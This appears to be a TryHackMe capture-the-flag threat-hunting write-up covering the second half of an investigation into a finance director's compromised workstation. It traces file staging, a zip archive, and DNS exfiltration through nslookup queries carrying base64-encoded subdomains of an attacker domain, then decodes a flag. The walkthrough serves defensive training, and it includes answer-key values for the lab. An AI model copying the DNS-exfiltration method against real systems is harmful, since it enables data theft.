THM : Hunt Me I: Payment Collectors Part. 2
Scenario : A Senior Finance Director from a company downloaded a malicious zip. We are called to conduct an investigation.
Continuation of the Part. 1 that can be found here : https://medium.com/@MDK_BE/thm-hunt-me-i-payment-collectors-part-1-060de5030d8d
9. What directory did the attacker copy the contents of the file share to?
We know that the attacker copied the content of the file share to the local computer in order to exfiltrate them. Based on this crucial information, we will look for File Creation event using :
winlog.event_id: 11
We clearly see that the attacker copied various file in the “C:\Users\michael.ascot\Downloads\exfiltration” directory. Therefore it is the directory used for the exfiltration.
Answer : C:\Users\michael.ascot\Downloads\exfiltration
10. What was the name of the Excel file the attacker extracted from the file share?
From the above screenshot, we can see that the attacker copied the “ClientPortfolioSummary.xlsx” Excel sheet to the exfiltration directory.
Answer : ClientPortfolioSummary.xlsx
11. What was the name of the archive file that the attacker created to prepare for exfiltration?
From the screenshot in question 9, we see that the attacker created a zip file called “exfilt8me.zip”
Answer : exfilt8me.zip
12. What is the MITRE ID of the technique that the attacker used to exfiltrate the data?
Resolving question 13 and 14 before this one allows us to understand the way the attacker exfiltrated the data. We know that the attacker used nslookup to exfiltrate data through various base64 encoded subdomains.
Based on that fact, when search the techniques used for Tactic Exfiltration TA0010, we find an interesting one, which is T1048 Exfiltration Over Alternative Protocol. It seams to perfectly fit the technique used by the attacker. In the description:
Alternate protocols include FTP, SMTP, HTTP/S, DNS, SMB, or any other network protocol not being used as the main command and control channel. Adversaries may also opt to encrypt and/or obfuscate these alternate channels.
Answer : T1048
13. What was the domain of the attacker’s server that retrieved the exfiltrated data?
Performing a winlog.event_id : 1 we see that the attacker used a lot the nslookup tool to query the domain haz4rdw4re.io with various subdomain names that appear base64 encoded.
Answer : haz4rdw4re.io
14. The attacker exfiltrated an additional file from the victim’s workstation. What is the flag you receive after reconstructing the file?
To answer this question, we can decode the two last base64 encoded subdomains using CyberChef:
- RmYjEyNGZiMTY1NjZlfQ==.haz4rdw4re.io
- VEhNezE0OTczMjFmNGY2ZjA1OWE1Mm.haz4rdw4re.io
Which gives out the following flag :
Answer : THM{1497321f4f6f059a52dfb124fb16566e}
